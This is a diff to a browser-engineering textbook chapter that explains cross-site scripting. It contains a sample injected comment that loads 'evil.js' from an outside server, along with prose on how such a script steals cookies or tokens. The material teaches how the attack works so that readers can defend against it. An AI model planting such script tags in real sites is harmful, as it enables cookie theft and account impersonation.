browserengineering/book/book/security.md

     <p>Hi! <script src="http://my-server/evil.js"></script>
     <i> by crashoverride</i></p>

-So, our browser would download and run the `evil.js` script.
-So `evil.js` could access `document.cookie` and do something evil; in real browser, this might mean using `fetch` to secretly send that cookie to a server the attacker controls.[^no-fetch]
+Our browser would then download and run the `evil.js` script.
+Then `evil.js` could access `document.cookie` and do something evil, like sending it to an attacker who could then impersonate you.
+In a real browser, `evil.js` might us `fetch` to secretly send that cookie to the attacker's server, but more complicated attacks work in our limited browser as well.[^no-fetch]

-[^no-fetch]: Our browser doesn't implement `fetch`, but that doesn't
+[^no-fetch]: For example, the evil script can replace the whole page
-    mean this attack won't work.
-For example, the evil script can replace the whole page with a link that directs their site and includes the token value in the URL.
+    with a link that directs their site and includes the token value in the URL.
 You've seen "please click to continue" screens and have clicked the button unthinkingly; your users will too.

 The core problem behind these problems is that user comments are supposed to be data, but the browser is interpreting them as code.